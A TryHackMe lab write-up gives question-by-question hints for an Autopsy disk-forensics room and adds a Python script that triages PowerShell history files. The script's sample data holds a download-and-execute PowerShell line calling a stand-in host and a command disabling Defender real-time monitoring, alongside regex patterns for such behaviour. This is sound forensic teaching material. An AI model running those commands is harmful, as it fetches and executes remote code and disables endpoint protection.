tryhackme disk analysis & autopsy writeup

posted on March 5, 2023, 5:51 a.m.

https://tryhackme.com/room/autopsy2ze0
  •  I do not provide any answers.

  •  To connect to tryhackme virtual machines go here: https://tryhackme.com/access

  •  If the directions are written clearly in the task description, then I will skip that question.

  •  Basically, if you are stuck then check this writeup.
Task 1:
When opening the case, click Yes to select the image located in "Case Files" -- you need this to be able to read the registry and the other important information.

  •  Question 1:
     Found under "Data Sources" -- click on the image and go to "File Metadata" at the bottom
  •  Question 2:
     Found under "Operating System Information" -- remember that it is not asking for a username
  •  Question 3:
     Found under "Operating System User Account" -- sort the usernames alphabetically and use the "Flag" column to find the normal users
  •  Question 4:
     Found in the same place as question 3
  •  Question 5:
     You would have to find this information in the registry
     OR
     Found in "Data Sources" > "HASAN2" > "Vol3" > "Program Files(x86)" > "Look@LAN" -- look at the details of the irunin.ini file
     Look@LAN is a free network monitoring tool
  •  Question 6:
     Found in the same file as question 5 -- LAN NIC (network interface card)
  •  Question 7:
     Go to "Operating System Information" > Software -- click on "Application" in the detail pane at the bottom and go to ROOT/Microsoft/Windows NT/CurrentVersion/NetworkCards/2
  •  Question 8:
     You found this already
  •  Question 9:
     Found under "Results" > "Extracted Content" > "Web Bookmarks"
  •  Question 10:
     Found under "Data Sources" > "HASAN.301" > "VOL3" > "Users" -- go through each user's Downloads folder to find the one that downloaded a wallpaper
  •  Question 11:
     The PowerShell history file is located at APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
     More information at https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html
     Use Keyword Search to search for "ConsoleHost_history.txt" as an exact term
     Find the matching location and read the file for the old flag
  •  Question 12:
     You can find the answer in the same place as question 11
     OR
     You can gather that this person uses PowerShell and therefore search for a PowerShell file
     Found under "Data Sources" > "HASAN.301" > "VOL3" > "Users" > "Shreya" > "Desktop" > PowerShell file
  •  Question 13:
     If the hacktools were found, then some program found them
     Look first at the Windows Defender detection logs at "Data Sources" > "HASAN2.E01" > "Vol3" > ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\02
  •  Question 14:
     Search for a .yar file -- you will find a .yar.lnk file -- look at the text and you'll see that H4S4N once had the actual .yar file on his desktop
     If you navigate to H4S4N's desktop you'll find nothing there (presumably because the malware deleted itself)
     But because the malware or hacker forgot to delete the zip from the Downloads folder, you can find it in Downloads and double-click the zip archive to see the file contents
  •  Question 15:
     This part requires some OSINT -- look for information on MS-NRPC based exploits
     You should quickly find a big one and its unofficial name
     Go to "Recent Documents" in Autopsy and find a file with that unofficial name
     This user *wanted* to perform the exploit themselves, so they downloaded a tool associated with the exploit
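For Questions 11 and 12 the writeup locates ConsoleHost_history.txt through Autopsy's keyword search by hand. As an added example (not part of the original writeup or of Autopsy), the Python script below does the same sweep over an exported or mounted volume: it finds every profile's PSReadLine history under Users\<name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ and flags the lines an analyst would review first. The triage patterns, the profiles alice and bob, and their command lines are all constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# PSReadLine history location relative to a user profile (the path cited in the writeup).
HISTORY_REL = Path("AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt")
# Hypothetical triage patterns: PowerShell behaviours an analyst usually reviews first.
SUSPICIOUS = [
    (re.compile(r"-enc(odedcommand)?\b", re.I), "encoded command"),
    (re.compile(r"downloadstring|invoke-webrequest|\biwr\b", re.I), "download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "dynamic execution"),
    (re.compile(r"-executionpolicy\s+bypass", re.I), "policy bypass"),
    (re.compile(r"set-mppreference|add-mppreference", re.I), "defender tampering"),
]

def find_history_files(root):
    """Yield (username, path) for each profile under <root>/Users that has a history file."""
    users_dir = Path(root) / "Users"
    for profile in sorted(users_dir.iterdir()) if users_dir.is_dir() else []:
        hist = profile / HISTORY_REL
        if hist.is_file():
            yield profile.name, hist

def triage_history(path):
    """Return (line_no, reason, command) for each history line matching a triage pattern."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            cmd = line.rstrip("\n")
            reason = next((r for pat, r in SUSPICIOUS if pat.search(cmd)), None)
            if reason:
                hits.append((n, reason, cmd))
    return hits

def triage_image(root):
    """Map username -> triage hits for every profile on an exported or mounted volume."""
    return {user: triage_history(p) for user, p in find_history_files(root)}

def build_sample_volume():
    """Constructed mini volume (not data from the case image) with two profiles for a dry run."""
    root = Path(tempfile.mkdtemp())
    sample = {"alice": ["Get-ChildItem C:\\Users", "powershell -ExecutionPolicy Bypass -File .\\s.ps1",
                        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"],
              "bob": ["Get-Date", "Set-MpPreference -DisableRealtimeMonitoring $true"]}
    for user, cmds in sample.items():
        hist = root / "Users" / user / HISTORY_REL
        hist.parent.mkdir(parents=True)
        hist.write_text("\n".join(cmds) + "\n", encoding="utf-8")
    return root
```

Point `triage_image()` at the root of a volume exported from Autopsy (the folder containing `Users`) to run it against a real case; each hit carries the line number so it can be cross-referenced with the file view in Autopsy.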